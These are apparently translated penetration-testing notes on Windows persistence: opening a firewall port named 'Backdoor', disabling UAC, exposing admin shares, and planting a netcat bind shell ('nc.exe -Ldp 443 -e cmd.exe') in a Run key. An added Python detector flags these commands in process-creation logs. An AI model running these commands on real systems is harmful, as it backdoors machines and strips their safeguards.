1. Firewall
https://docs.microsoft.com/zh-cn/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior
https://blog.csdn.net/no1xium/article/details/107358939
netsh advfirewall firewall add rule name= "Open Port 80" dir=in action=allow protocol=TCP localport=80 (new syntax)
netsh firewall add portopening TCP 443 "Backdoor" ENABLE ALL (legacy syntax)
netsh advfirewall firewall show rule name=all profile=private
2. UAC
Disable
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Enable
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
3. Default shares
net share c$=c:
net share d$=d:
net share ipc$
net share admin$
Or modify the registry from the command line
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
4. upload: upload programs, trojans, backdoors
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
5. Modify the registry for autostart
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "java" /t REG_SZ /d "C:\Program File\Java\jre1.6.0_02\java.exe" /f
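The syntax of reg add is: REG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separator] [/d Data] [/f]
6. Execute a file on the target machine
Autostart at boot, or
execute -f <name of the executable on the target machine>
Reference: https://blog.csdn.net/weixin_54472394/article/details/124619632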
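For the defending side, the commands in sections 1, 2, 3 and 5 all leave a process command line that can be matched in process-creation logs. The following is an added example, not part of the original notes: the rule names, the `detect` and `scan` helpers and the sample lines are constructed for illustration.

```python
import re

# Added illustration: each rule pairs a label with a regex applied to a process
# command line (e.g. from Sysmon Event ID 1 or Security Event ID 4688).
RULES = [
    ("firewall_inbound_allow", re.compile(
        r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b"
        r"(?=.*\bdir\s*=\s*in\b)(?=.*\baction\s*=\s*allow\b)", re.I)),
    ("firewall_legacy_portopening", re.compile(
        r"netsh\s+firewall\s+add\s+portopening\b", re.I)),
    ("uac_disabled", re.compile(  # EnableLUA written as 0 only
        r"\breg(\.exe)?\s+add\b.*\\Policies\\System\b.*\bEnableLUA\b.*/d\s+0\b", re.I)),
    ("remote_uac_filter_disabled", re.compile(
        r"\breg(\.exe)?\s+add\b.*\bLocalAccountTokenFilterPolicy\b.*/d\s+1\b", re.I)),
    ("run_key_autostart", re.compile(
        r"\breg(\.exe)?\s+add\b.*\\CurrentVersion\\Run(Once)?\b", re.I)),
    ("admin_share_created", re.compile(
        r"\bnet1?(\.exe)?\s+share\s+(\w\$\s*=|ipc\$|admin\$)", re.I)),
]

def detect(command_line):
    """Return the labels of every rule matching one command line."""
    return [name for name, rx in RULES if rx.search(command_line)]

def scan(lines):
    """Map each flagged command line to the labels it triggered."""
    hits = {}
    for line in lines:
        matched = detect(line)
        if matched:
            hits[line] = matched
    return hits

# Constructed sample command lines (not real log data).
SAMPLES = [
    r'netsh advfirewall firewall add rule name= "Open Port 80" dir=in action=allow protocol=TCP localport=80',
    r'netsh advfirewall firewall show rule name=all profile=private',
    r'C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f',
    r'C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f',
    r'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f',
    r'net share admin$',
    r'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "java" /t REG_SZ /d "C:\example\app.exe" /f',
]

if __name__ == "__main__":
    for line, names in scan(SAMPLES).items():
        print(", ".join(names), "<-", line)
```

A Run value written through a session's registry API, as in section 4, produces no reg.exe command line, so it needs registry value-set auditing (for example Sysmon Event ID 13) on the Run keys rather than these rules.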